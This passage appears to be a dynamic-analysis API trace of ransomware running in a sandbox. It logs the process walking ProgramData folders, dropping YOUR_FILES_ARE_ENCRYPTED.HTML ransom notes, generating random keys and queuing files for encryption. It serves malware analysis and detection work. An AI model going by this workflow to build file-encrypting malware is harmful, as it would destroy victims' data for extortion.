Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{7d0b74c2-c3f8-4af1-940f-cd79ab4b2dce}v14.25.28508\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0108.759] WriteFile (in: hFile=0x30c, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0108.759] CloseHandle (hObject=0x30c) returned 1 [0108.760] GetProcessHeap () returned 0x600000 [0108.760] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0108.760] GetProcessHeap () returned 0x600000 [0108.760] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0108.761] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c938406, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9496c7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c9496c7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", cAlternateFileName="{929FB~1.210")) returned 1 [0108.761] StrStrIW (lpFirst="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.761] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned 82 [0108.761] GetProcessHeap () returned 0x600000 [0108.761] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0108.762] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005" [0108.762] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*" [0108.762] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c938406, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9496c7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c9496c7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x626838 [0108.762] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c938406, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9496c7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c9496c7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0108.762] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c9496c7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9496c7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c9496c7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 1 [0108.762] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.762] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned 91 [0108.762] GetProcessHeap () returned 0x600000 [0108.762] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0108.763] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages" [0108.763] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*" [0108.763] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c9496c7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9496c7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c9496c7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1870, dwReserved1=0x623f60, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0108.764] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c9496c7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9496c7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c9496c7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1870, dwReserved1=0x623f60, cFileName="..", cAlternateFileName="")) returned 1 [0108.764] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c9496c7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9a8a2e, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c9a8a2e, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1870, dwReserved1=0x623f60, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0108.764] StrStrIW (lpFirst="vcRuntimeAdditional_amd64", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.764] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned 117 [0108.764] GetProcessHeap () returned 0x600000 [0108.764] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0108.765] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64" [0108.765] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*" [0108.765] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c9496c7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9a8a2e, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c9a8a2e, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0108.765] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c9496c7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9a8a2e, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c9a8a2e, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0108.765] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec82c300, ftCreationTime.dwHighDateTime=0x1cf3e1d, ftLastAccessTime.dwLowDateTime=0xec82c300, ftLastAccessTime.dwHighDateTime=0x1cf3e1d, ftLastWriteTime.dwLowDateTime=0xec82c300, ftLastWriteTime.dwHighDateTime=0x1cf3e1d, nFileSizeHigh=0x0, nFileSizeLow=0x554520, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0108.765] StrStrIW (lpFirst="cab1.cab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.765] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0108.765] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0108.765] lstrlenW (lpString=".cab") returned 4 [0108.765] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0108.765] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0108.765] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0108.766] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=5588256) returned 1 [0108.766] GetProcessHeap () returned 0x600000 [0108.766] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3163dd0 [0108.768] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="99") returned 2 [0108.768] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="ED") returned 2 [0108.768] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="2C") returned 2 [0108.768] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="9F") returned 2 [0108.768] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="AC") returned 2 [0108.768] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="46") returned 2 [0108.768] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="B8") returned 2 [0108.768] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="EB") returned 2 [0108.768] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="30") returned 2 [0108.768] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="9B") returned 2 [0108.768] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="BB") returned 2 [0108.768] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="F1") returned 2 [0108.768] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="C5") returned 2 [0108.769] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="55") returned 2 [0108.769] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="ED") returned 2 [0108.769] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="02") returned 2 [0108.769] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="50") returned 2 [0108.769] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="F0") returned 2 [0108.769] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="19") returned 2 [0108.769] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="49") returned 2 [0108.769] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="85") returned 2 [0108.769] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="54") returned 2 [0108.769] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="C7") returned 2 [0108.769] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="87") returned 2 [0108.769] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="40") returned 2 [0108.769] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="4D") returned 2 [0108.769] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="84") returned 2 [0108.769] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="1E") returned 2 [0108.769] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="84") returned 2 [0108.769] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="7A") returned 2 [0108.769] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="15") returned 2 [0108.769] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="4A") returned 2 [0108.769] lstrcpyW (in: lpString1=0x3173e84, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0108.769] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x3163dd0, NumberOfConcurrentThreads=0x0) returned 0x274 [0108.770] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3163dd0, lpOverlapped=0x3163dd0) returned 1 [0108.770] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea206900, ftCreationTime.dwHighDateTime=0x1cf3e1d, ftLastAccessTime.dwLowDateTime=0xea206900, ftLastAccessTime.dwHighDateTime=0x1cf3e1d, ftLastWriteTime.dwLowDateTime=0xea206900, ftLastWriteTime.dwHighDateTime=0x1cf3e1d, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0108.770] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.770] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0108.770] PathFindExtensionW (pszPath="vc_runtimeAdditional_x64.msi") returned=".msi" [0108.770] lstrlenW (lpString=".msi") returned 4 [0108.770] PathFindExtensionW (pszPath="vc_runtimeAdditional_x64.msi") returned=".msi" [0108.770] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea206900, ftCreationTime.dwHighDateTime=0x1cf3e1d, ftLastAccessTime.dwLowDateTime=0xea206900, ftLastAccessTime.dwHighDateTime=0x1cf3e1d, ftLastWriteTime.dwLowDateTime=0xea206900, ftLastWriteTime.dwHighDateTime=0x1cf3e1d, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0108.770] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0108.770] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 147 [0108.770] GetProcessHeap () returned 0x600000 [0108.770] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0108.770] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0108.847] WriteFile (in: hFile=0x32c, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0108.848] CloseHandle (hObject=0x32c) returned 1 [0108.849] GetProcessHeap () returned 0x600000 [0108.849] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0108.849] GetProcessHeap () returned 0x600000 [0108.849] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0108.849] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c9496c7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9a8a2e, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c9a8a2e, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1870, dwReserved1=0x623f60, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0108.849] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0108.850] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0108.850] GetProcessHeap () returned 0x600000 [0108.850] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0108.850] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0108.851] WriteFile (in: hFile=0x308, lpBuffer=0x314b010*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x314b010*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0108.852] CloseHandle (hObject=0x308) returned 1 [0108.852] GetProcessHeap () returned 0x600000 [0108.852] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0108.852] GetProcessHeap () returned 0x600000 [0108.852] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.853] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c9496c7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c9496c7, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c9496c7, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 0 [0108.853] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0108.853] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0108.853] GetProcessHeap () returned 0x600000 [0108.853] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x313b008 [0108.854] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0108.854] WriteFile (in: hFile=0x30c, lpBuffer=0x313b008*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x313b008*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0108.855] CloseHandle (hObject=0x30c) returned 1 [0108.855] GetProcessHeap () returned 0x600000 [0108.855] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.855] GetProcessHeap () returned 0x600000 [0108.856] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0108.857] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c8dfa73, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c905d7a, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x4c905d7a, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", cAlternateFileName="{A749D~1.210")) returned 1 [0108.857] StrStrIW (lpFirst="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.857] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned 82 [0108.857] GetProcessHeap () returned 0x600000 [0108.857] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0108.858] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005" [0108.858] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*" [0108.859] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4c8dfa73, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x4c905d7a, ftLastAccessTime.dwHighDateTime=0x1d705cc, 